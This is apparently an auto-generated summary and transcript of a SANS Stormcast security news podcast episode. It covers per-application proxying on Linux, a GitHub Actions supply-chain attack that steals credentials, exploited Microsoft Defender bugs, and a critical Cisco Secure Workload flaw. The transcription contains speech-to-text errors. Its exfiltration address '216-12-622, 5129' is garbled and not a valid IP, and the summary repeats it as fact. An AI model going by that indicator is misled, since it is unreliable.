SANS Stormcast Friday, May 22nd, 2026: Selective HTTP Proxying; More GitHub Repo Trouble; MSFT Defender Patches; - SANS Internet Stormcenter Daily Cyber Security Podcast (Stormcast)

Summary5 min read

Episode Overview

Podcast: SANS Internet Stormcenter Daily Cyber Security Podcast (Stormcast)
Host: Johannes B. Ullrich
Date: May 22, 2026
Main Theme:
This episode provides a concise roundup of current cybersecurity developments, focusing on selective HTTP proxying methods on various operating systems, a major ongoing GitHub supply chain attack, critical Microsoft Defender and Cisco Secure Workload patches, and practical defense recommendations.

Key Discussion Points & Insights

1. Selective HTTP Proxying on Different Platforms

[00:20 – 02:33]

Proxifier Tool (Windows/Mac):
- Useful for intercepting traffic from specific applications via a proxy.
- Preferred for reverse engineering and analysis to avoid "noise" from all traffic.
- Notably, no comprehensive Proxifier support exists for Linux; Android’s version is not truly cross-platform.
  - "Proxifier only works on Macs and on Windows. Yes, there is sort of an Android version, but no sort of generic Linux version." — Johannes B. Ullrich (00:38)
Linux Alternatives:
- Environment Variables (http_proxy, https_proxy):
  - Set before app launch to proxy only that app's HTTP(S) traffic.
  - "Many sort of HTTP libraries are looking for these environment variables and will use any proxy." — Johannes B. Ullrich (01:11)
- iptables/User-based Proxying:
  - Redirects traffic based on running user. Limitation: only practical if a single application runs as that user.
  - "With IPT you're kind of only able to redirect traffic from a particular user." — Johannes B. Ullrich (01:29)
- Network Namespaces:
  - Considered the "neatest and often overlooked" method.
  - Allows custom network environments for individual applications, enabling isolated proxy setup.
  - "You can define essentially sort of a custom network configuration for a particular application." — Johannes B. Ullrich (01:42)
  - Ensures app-specific proxy interception without system-wide changes.
- Linux/Android Cross-compatibility:
  - The podcast wonders if the Android Proxifier can run under Linux, suggesting further exploration.

2. Another Major GitHub Repository Supply Chain Attack

[02:33 – 04:16]

Attack Overview:
- Not a direct attack on GitHub itself, but on users’ repositories.
- Attackers leverage credentials harvested from previous breaches.
  - "Apparently this attack is using harvested credentials from prior attacks in order to infiltrate specific repositories." — Johannes B. Ullrich (02:46)
Scope:
- At least 5,000 repositories affected.
Attack Method:
- Malicious GitHub Actions are injected into victim repositories.
- Actions are designed to exfiltrate secrets and credentials (AWS, Google, SSH keys, API keys, DB connection strings, JWTs, etc.).
  - "Once, well, you're affected by these, you will basically lose all of your environment variables, your AWS credentials, your Google credentials, your SSH private keys, any kind of API keys, database connection strings..." — Johannes B. Ullrich (03:28)
- Triggers range from noisy (on every push/pull) to stealthy (externally triggered).
Command & Control:
- Secrets are exfiltrated to a specific IP: 216-12-622, 5129.
Evasion Tactics:
- Malicious actors use seemingly benign names: “Auto CI”, “CI Bot”, “Pipeline Bot”, blending in with legitimate CI/CD tools.
  - "The author actually is pretty good in sort of disguising themselves by using names like Auto CI or CI Bot or Pipeline Bot..." — Johannes B. Ullrich (04:06)
Reference:
- SafeDEP IO’s blog post cited as a comprehensive source on the attack.

3. Microsoft Defender Vulnerabilities & Automatic Patching

[04:16 – 04:52]

Vulnerabilities:
- Redsun & Undefend: Two privilege escalation bugs in Windows Antivirus (Microsoft Defender).
- Already exploited before patching.
Response:
- Microsoft released out-of-band updates directly to the antivirus platform, not through standard Patch Tuesday.
- Update is automatic for Defender users—no manual action required.
  - "There is nothing really that you have to do as a user. This is an update to the antivirus platform and it's regularly updated just like the rules being used by Windows Defender." — Johannes B. Ullrich (04:30)
- Users should verify that their Defender is up-to-date.

4. Cisco Secure Workload Vulnerability

[04:52 – 05:27]

Vulnerability:
- Authentication Bypass in REST API affecting Secure Workload product.
- Allows unauthorized access to site admin functionality.
- Rated CVSS 10 (maximum severity)—critical for environments where Secure Workload’s API is exposed to untrusted networks.
  - "This is a complete 10 on the CVSS scale, so definitely something that you probably want to address..." — Johannes B. Ullrich (05:13)
- Recommended immediate patching and review of exposed interfaces.

Notable Quotes & Memorable Moments

On Linux Proxy Setup:
- "I think sort of the neatest and often overlooked feature in Linux is network namespaces..." — Johannes B. Ullrich (01:41)
On Supply Chain Attacks:
- "In case you thought that, well, today he's not going to talk about any supply chain issues again, sorry, still have to do it." — Johannes B. Ullrich (02:37)
On GitHub Secrets Theft:
- "You will basically lose all of your environment variables... Well, pretty much everything sort of secret on your system." — Johannes B. Ullrich (03:29)
On Not Required Action for Microsoft Defender Users:
- "There is nothing really that you have to do as a user. This is an update to the antivirus platform and it's regularly updated..." — Johannes B. Ullrich (04:30)

Timestamps for Important Segments

[00:20] Introduction to selective proxying and Proxifier
[01:11] Linux proxying via environment variables
[01:41] Network namespaces for application-specific proxying
[02:33] Latest GitHub supply chain attack and exfiltration techniques
[04:16] Microsoft Defender privilege escalation vulnerabilities & patches
[04:52] Cisco Secure Workload REST API vulnerability

Tone & Language

The episode is delivered in a concise, practical tone with a touch of dry humor ("sorry, still have to do it"), making advanced security topics approachable for industry practitioners. Johannes B. Ullrich provides actionable technical advice and pointed reminders about staying vigilant, especially relating to rapidly evolving supply chain threats.

Summary for Listeners

This episode is a quick, high-density update for cybersecurity professionals, zeroing in on application-specific proxying techniques (especially for Linux), a rapidly spreading GitHub-based supply chain attack with far-reaching theft of secrets via compromised repository actions, and urgent patching news for core enterprise security products (Microsoft Defender and Cisco Secure Workload). If you manage repositories, use Linux tools, or operate enterprise workloads, the quick hits and practical mitigation tips are particularly timely.

Loading summary

Transcript1 lines

[00:05]
A
Hello and welcome to the Friday, May 22, 2026 edition of the Sands Internet Storm Center's Stormcast. My name is Johannes Ulrich, recording today from Jacksonville, Florida. This episode is brought to you by the SANS EDU Graduate Certificate Program in Cybersecurity Engineering. Last week, Rob wrote a diary about a tool called Proxifier. Proxifier is neat because it allows you to intercept traffic with a proxy from specific applications. Of course, that's great for reverse analysis and such. Yes, you could just proxy all traffic, but then of course you have to deal with all the noise that you're getting in addition to the traffic from the application you're interested in. The trick here is that Proxifier only works on Macs and on Windows. Yes, there is sort of an Android version, but no sort of generic Linux version. So I looked into, well, how do you do it in Linux? And as far as I know there are really sort of three different ways of doing it. Number one, you can set specific environment variable httproxy and httpsproxy. Many sort of HTTP libraries are looking for these environment variables and will use any proxy. So before starting the application you just set these environment variables. You can do it a little bit with iptables, but with IPT you're kind of only able to redirect traffic from a particular user. So you have to make sure that this application, well, is the only application being run by a particular user. And then I think sort of the neatest and often overlooked feature in Linux is network namespaces, where you can define essentially sort of a custom network configuration for a particular application. And you essentially do this by defining which network interfaces and then also like custom routing tables and so are being used in this namespace. And then you assign that namespace to the application or the application to the namespace, and then the application basically sees a different network environment than the rest of the system. And that again allows you to selectively intercept traffic that emerges from this namespace or basically in this case, from this application. So yes, you can do it in Linux. Not sure if the Android version of Proxifier can somehow be used in Linux, but that may be probably the easiest solution if that is possible. Well, in case you thought that, well, today he's not going to talk about any supply chain issues again, sorry, still have to do it. We have another big attack against GitHub repositories, this time not against GitHub itself, but against users of GitHub. Apparently this attack is using harvested credentials from prior attacks in order to infiltrate specific repositories. Something like 5,000 different repositories have so far been affected. SafeDEP IO has published a good blog post and I think there's the ones here that originally came across this attack in order to actually exfiltrate credentials. Well, it basically adds GitHub actions and these GitHub actions, they have a couple different ways sort of to trigger them, some on each push and pull. So basically these are fairly noisy GitHub actions, but then you also have some more stealthy ones that can be triggered externally. And once, well you're affected by these, you will basically lose all of your environment variables, your AWS credentials, your Google credentials, your SSH private keys, any kind of API keys, database connection strings, jwts, PM private keys, cloud tokens. Well, pretty much everything sort of secret on your system. The data is then being exfiltrated to an IP address. 216-12-622, 5129 and well, the author actually is pretty good in sort of disguising themselves by using names like Auto CI or CI Bot or Pipeline Bot, essentially names that kind of fit in with CI City Pipeline and Microsoft released update for its Windows antivirus platform, fixing the recent privilege escalation vulnerabilities that have already been exploited. Redsun and Undefend are the names for these two. There is nothing really that you have to do as a user. This is an update to the antivirus platform and it's regularly updated just like the rules being used by Windows Defender, so it should automatically be already installed on your system. This is not one of those Patch Tuesday updates and Cisco released some updates today. One interesting one affects the Cisco Secure Workload. Well, this is a system that essentially allows you to essentially sort of sandbox critical and possibly dangerous or vulnerable payloads. What better way to do it than use a vulnerable system like Secure Workload in order to accomplish this? Apparently Secure Workload has an authentication bypass vulnerability in the REST API, allowing an unauthorized user to get site admin access. This is a complete 10 on the CVSS scale, so definitely something that you probably want to address in particular if that REST API that controls Cisco's Secure Workload is somewhat exposed. Well, and this is it for today, so thanks for listening, thanks for liking, thanks for subscribing also to this podcast and if you have any questions please email me or if you have any feedback please let me know. The next podcast will be on Tuesday because Monday is Memorial Day holiday here in the US so we'll skip Monday. So talk to you again on Tuesday. Bye. It.